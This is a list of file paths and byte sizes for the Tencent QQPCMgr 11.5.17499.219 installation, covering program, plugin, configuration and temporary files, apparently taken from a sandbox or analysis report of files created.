    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVDescr.ipt (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_2016.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.dll (10011 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibexceptac.xml (27 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\IEStartPageConfig.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\searchlist.dat (990 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysSpeedUp\SysSpeedUp.rdb (68 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\crc.dat (410596 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr03.def (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.rdb (228 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSysOptimize.rdb (255 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\AGEConfig.etf (4 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\FaceMask57.png (530 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\AdBlock\AdBlockConf.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\QQPCCommonMgr.rdb (15021 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QQPCMgrInstall_20160519101428.Log (25356 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMNewsTips\QMNewsTips.dll (5962 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMInjectUtils.dll (1008 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQRepair.dat (656 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVEng.dll (7460 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1087.dat (447 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftAAL.sys (784 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMInterfaceExe.exe (156 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRecommender.dll (5298 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1601.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SysOptLib.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\router_config.xml (55 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\GF.dll (17445 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibpw.xml (960 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sCheck_Wireless.png (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\DZSConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMInterface.dll (679 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinicHelper64.exe (378 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetSpeedTest.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_642.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCScriptApi.dll (4001 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\TimingTaskParam.xml (413 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\xGraphic32.dll (1204 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\qmcloudinter\QMCloudInter.dll (6150 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRTPTipsConfig.dat (10 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1105.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMLDPatch.dll (399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\bugreport.exe (3465 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.rdb (86 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupExposure\GameSpeedupExposure.tpc (953 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tscpm64.sys (310 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\tinyxml.dll (1828 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_579.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSSafeEdit.dat (110 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_587.png (2 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\tsvulinfocrp.db (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupExposure\GameSpeedupExposure.rdb (1850 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\Common.dll (16793 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libjpegturbo.dll (4138 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1017.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.rdb (123 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\StartupMgr.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebShieldX64.dat (3675 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.dll (7069 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.dll (2480 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCConfigCatalog.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\TPBrowser.dat (983 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\msvcp80.dll (7937 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCUpdateAVLib.exe (1465 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\UninstallTips.exe (3063 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\StartupMgrDll.dll (5057 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ScenePackage.dat (8 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\TPBackImage.png (43 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1018.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\PhotoCraftPlugin.png (615 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\CFConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_15.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulInf.Dat (1610 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\8.0.50727.4053.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\GameBoxPlugin_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCMgrCmdline.xml (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.dll (2039 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmaplocal.dat (109 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\xpNotify.html (549 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.dll (2072 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupTipsMgr\GameSpeedupTipsMgr.rdb (24 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1977.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\JFZRConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPYellowTipsMgr.dll (1483 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.dll (5861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPersonalCenter.rdb (40 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine\CommonIcon\blank_gray.ico (82 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\libpng.dll (1406 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulFilter.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCmgrInstallGuide.rdb (141 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMRouterPlugin\QMRouterPlugin.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.tpc (790 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\xGraphic32.dll (1440 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMTrojanScan.tpc (688 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulInc.dat (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\Microsoft.VC80.ATL.Manifest (466 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCmgrInstallGuide.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt.dll (4388 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1891.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.rdb (6372 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\AutoTaskConfig.bat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\vircmpinfo.def (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibwhite.xml (26 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRepair.rdb (37 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysmalwarejmp\SysMalwareJmp.dll (793 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLPConfig.dat (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCTray.rdb (122 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1007.dat (503 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\traceclear.dat (13 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1082.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterMgr.rdb (230 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\Common.dll (17453 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_558.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\bugreport.exe (7337 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\OperationFileCloudMgr.dll (1651 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAutoClean.exe (3202 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AndroidAssistHelper.dll (5558 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_168.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\xImage.dll (3606 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\GameSpeedupExposure.dll (2690 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMTrojanScan.dll (10918 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1100.dat (452 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10492.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QMDataUpdate.dll (2857 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMobileFlux\NetMobileFlux.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIEProtect.sys (1271 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_13.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\NetRepairPage.js (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinic.rdb (3795 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCPatch.exe (4811 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_771.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.rdb (28 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Common.dll (16830 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr04.def (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDL.exe (2063 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10523.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\qqpccommonmgr.dat (536 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1109.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NetRepair.exe (3655 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.rdb (3769 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\Check_Wireless.png (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMSysSlim.png (691 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysStartupMgrJmp.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftConfig.rdb (75 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMProtect.dll (2263 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.prf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\qqpctray.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCPatch.dll (2549 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\MXConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\softmgr_notify.ico (289 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1302.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_190.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\StartupLoad.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm04.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NetRepair.rdb (178 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.rdb (106 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\RefuseInject.dll (1831 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1409.dat (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCLeakScan.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Scc.dll (5814 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_156.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVE.dll (3805 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMNetworkMgr64.dll (4554 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpktt.dll (27696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSpecTips\QMSpecTips.tpc (685 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMIEMalRtpPlugin\QMIEMalRtpPlugin.dll (1967 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NetRepair.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\YLZTConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpDLL.dll (1093 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAccountProtection.rdb (3757 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.rdb (309 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virswf01.def (656 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScanPluginInfo.xml (36 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\Install.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_2.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\GarbageSoftInfo.xml (18 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1011.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1021.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\HomePageRecommendItemsRes.zip (8 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\KingRoot.png (878 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\jgImage.dll (45 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\arkGraphic.dll (3997 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield256.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.exe (4093 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpkreport.dll (3499 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\SoftMon.etf (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\ATL80.dll (1213 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMScriptHost.dll (2393 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupTipsMgr\GameSpeedupTipsMgr.tpc (950 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.32.prf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileLinkRepair.etf (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLibTray.dat (44 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\npQMExtensionsMozilla.dll (1672 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1403.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\TraceClear.dll (2533 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1526.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_11.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulEngine.dll (5972 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1226.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.rdb (142 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_808.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAntiInject.dll (284 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\ProcessNameList.xml (30 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\libjpegturbo.dll (1977 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\extract.dll (3788 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUdisk64.sys (3599 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\tinyxml.dll (299 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\Win10Tips.png (940 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMArpMgr.png (843 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMOfficeScan.dll (53 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1025.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCB2AndroidJmp.png (276 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.tpc (705 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.policy (808 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFileOpen.rdb (105 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSSysKit64.sys (1412 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.rdb (53 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\jgIOStub.dll (28 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_191.png (3 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\FaceMask71.png (660 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\QMGameAssistantPlugin.dll (2868 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVCleanDr.dll (2402 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.dll (4826 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\libexpatw.dll (690 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMCmcTrayPlugin\QMCmcTrayPlugin.dll (3765 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1404.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOWorkFlowMgr.dll (5468 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\point.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\GFCustom.dll (7227 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\xImage.dll (1125 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NPEStartup.db (79 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\WechatBackup.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMLogCtrl\QMLogCtrl.dll (4253 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMExtInstaller.dll (4108 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GFCustom.dll (5925 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\pedc.dat (1615 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\I18N\2052\SSOStringBundle.xml (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virdex01.def (131 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMChExt.exe (3304 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\starttips.xml (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ptrate.dll (1660 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\autoinstall.etf (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virsrc00.def (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUsbGuard.exe (7174 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_529.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHW.sys (35 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\MalWare.tpc (702 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Redusem.ini (25 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\libexpatw.dll (701 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1400.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSysOptimize.exe (5156 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_867.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1086.dat (449 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1222.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\GameHardwareInfo.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1221.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\MenuManager.png (789 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibpower.xml (302 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtSysIconGF.rdb (134 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMHIPSEngine.dll (61 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\Both_Disconnected.png (32 bytes)
